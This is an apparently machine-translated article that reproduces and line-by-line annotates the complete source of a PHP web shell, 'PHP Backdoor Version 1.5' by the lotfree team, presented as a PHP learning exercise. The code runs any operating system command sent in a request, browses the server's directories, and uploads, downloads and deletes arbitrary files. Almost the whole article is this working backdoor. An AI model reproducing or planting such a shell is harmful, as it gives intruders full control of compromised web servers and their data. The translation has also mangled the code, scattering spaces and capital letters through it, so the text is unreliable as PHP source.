Php backdoor program Parsing

PHP Backdoor Version 1.5 is a php Backdoor program compiled by sirius_black/lotfree team. Here, we will perform a simple analysis on it and take notes for learning php, the Command executed by the backdoor depends on the user's permissions when installing the web server and php. If it is an administrator, various operating system commands can be executed.

<! -The goodlink function is used to filter out invalid characters in the url.->
<? Php
Function good_link ($ link)
{
$ Link = ereg_replace ("/+", "/", $ link );
$ Link = ereg_replace ("/[^/(..)] +/\. \.", "/", $ link );
$ Link = ereg_replace ("/+", "/", $ link );
If (! Strncmp ($ link, "./", 2) & strlen ($ link)> 2) $ link = substr ($ link, 2 );
If ($ link = "") $ link = ".";
Return $ link;
}
 
// $ _ REQUEST is used to obtain the data submitted to this file.
$ Dir = isset ($ _ REQUEST ['dir'])? $ _ REQUEST ['dir']: "."; // if no dir is defined, use the default value "."
$ Dir = good_link ($ dir );
$ Rep = opendir ($ dir); // open the path handle specified by dir
Chdir ($ dir); // switch to the directory specified by dir
 
If (isset ($ _ REQUEST ["down"]) & $ _ REQUEST ["down"]! = "") // If down is defined
 
{
Header ("Content-Type: application/octet-stream ");
Header ("Content-Length:". filesize ($ _ REQUEST ["down"]);
Header ("Content-Disposition: attachment; filename =". basename ($ _ REQUEST ["down"]);
Readfile ($ _ REQUEST ["down"]); // read the file to the buffer zone
Exit ();
}
?>
<Html>
<Head> <title> lotfree php Backdoor v1.5, yeetrack.com </title> <Body>
<Br>
<? Php
Echo "current absolute path: <B>". getcwd (). "</B> <br> \ n"; // obtain the current absolute path
Echo "<B> dir = '$ dir' </B> <br> \ n ";
Echo "Current Directory, file list! <Br> \ n ";
 
// If the command to be executed has been entered
If (isset ($ _ REQUEST ['cmd']) & $ _ REQUEST ['cmd']! = "")
{
Echo "<pre> \ n ";
System ($ _ REQUEST ['cmd']); // execute the entered command on the server and display the execution result
Echo "</pre> \ n ";
}
 
// If a file has been uploaded
If (isset ($ _ FILES ["fic"] ["name"]) & isset ($ _ POST ["MAX_FILE_SIZE"]) // obtain the post file, save to current directory
{
If ($ _ FILES ["fic"] ["size"] <$ _ POST ["MAX_FILE_SIZE"]) // determines whether the file meets the size specifications
{
If (move_uploaded_file ($ _ FILES ["fic"] ["tmp_name"], good_link (". /". $ _ FILES ["fic"] ["name"]) // Save the temporary file to the current directory
{
Echo "the file is successfully saved". good_link ("./". $ _ FILES ["fic"] ["name"]). "! <Br> \ n ";
}
Else echo "File Upload Failed:". $ _ FILES ["fic"] ["error"]. "<br> \ n ";
}
Else echo "File too large (the File size exceeds the limit )! <Br> \ n ";
}
 
If (isset ($ _ REQUEST ['rm ']) & $ _ REQUEST ['rm']! = "") // If rm is defined, the specified file is deleted.
{
If (unlink ($ _ REQUEST ['rm ']) // unlink is a php file deletion function.
Echo "successfully deleted". $ _ REQUEST ['rm ']. "! <Br> \ n ";
Else echo "failed to delete file <br> \ n ";
}
 
?>
<Hr>
<Table align = "center" width = "95%" border = "0" cellspacing = "0" bgcolor = "lightblue">
<? Php
$ T_dir = array ();
$ T_file = array ();
$ I _dir = 0;
$ I _file = 0;
 
// Input the directory file before reading it cyclically and place it in t_dir and t_file.
While ($ x = readdir ($ rep ))
{
If (is_dir ($ x) // if the directory is currently being processed
$ T_dir [$ I _dir ++] = $ x;
Else // if the file is currently being processed
$ T_file [$ I _file ++] = $ x;
}
Closedir ($ rep); // close the directory handle opened by opendir
While (1) // enter the Directory and file of the current path in a loop
{
?>
 
<! -Use a table to display files in the current directory.->
<Tr>
<Td width = "20%" bgcolor = "lightgray" valign = "top">
<? Php
If ($ x = each ($ t_dir ))
{
$ Name = $ x ["value"]; // obtain the directory name in the t_dir Array
If ($ name = '.'){}
Elseif ($ name = '..') echo "<a href = '". $ _ SERVER ['php _ SELF']. "? Dir = ". good_link ("$ dir /.. /"). '> UP (parent directory) </a> <br> \ n "; // displays an UP link to read the list of files in the parent directory.
Else
Echo "<a href = '". $ _ SERVER ['php _ SELF']. "? Dir = ". good_link (" $ dir/$ name ")." '> ". $ name." </a> \ n ";
}
?>
</Td>
<Td width = '000000'
<? Php
 
// $ _ SERVER ['php _ SELF '] Get the current PHP script file name www.2cto.com
If ($ y = each ($ t_file ))
{
If ($ y ["key"] % 2 = 0) // if the current processing is key
Echo "bgcolor = 'lightgreen'> \ n ";
Else // if the current process is value, that is, the file. This file is displayed and a download link is provided.
Echo "> \ n ";
Echo "<a href = '". $ _ SERVER ['php _ SELF']. "? Dir = $ dir & down = ". $ y [" value "]." '> ". $ y [" value "]." </a> \ n ";
}
Else echo "> \ n ";
?>
</Td>
<Td valign = 'center' width = '2%'
<? Php
If ($ y)
{
// If it is a file, provide the following link to delete the file
If ($ y ["key"] % 2 = 0) echo "bgcolor = 'lightgreen '";
Echo "> <a href = '". $ _ SERVER ['php _ SELF']. "? Dir = $ dir & rm = ". $ y [" value "]." '> <B> Del </B> </a> ";
}
Else echo "> \ n ";
?>
</Td>
</Tr>
<? Php
If (! $ X &&! $ Y)
Break;
}
?>
</Table>
<Hr>
<Br>
<A href = "<? Php echo $ _ SERVER ['php _ SELF '];?>? Dir = "> revenir au repertoire d' origine </a> <br>
 
<! -Form: post the command entered by the user to the server.->
<Form method = "post" action = "<? Php echo $ _ SERVER ['php _ SELF ']. "? Dir = $ dir ";?>"> <! -Action: send the request to the current PHP file, define the dir, and refresh the current file list.->
Execute commande (Execute an operating system command) <input type = "text" name = "cmd"> <input type = "submit" value = "Run (execution)">
</Form> <br>
Upload files to the current directory on the server: <br>
<Form enctype = "multipart/form-data" method = "post" action = "<? Php echo $ _ SERVER ['php _ SELF ']. "? Dir = $ dir ";?>"> <! -Action: post the file to the server and refresh the current file list.->
<Input type = "file" name = "fic"> <input type = "hidden" name = "MAX_FILE_SIZE" value = "100000">
<Input type = "submit" value = "Start upload!"> </Form> <br>
<Br>
Yeetrack.com
<Center>
PHP Backdoor Version 1.5 <br>
By sirius_black/lotfree team <br>
Execute commands, browse the filesystem <br>
Upload, download and delete files... <Br>
<A href = "http://www.lsdp.net /~ Lotfree> http://www.lsdp.net /~ Lotfree </a> <br>
</Center>
</Body>
</Html>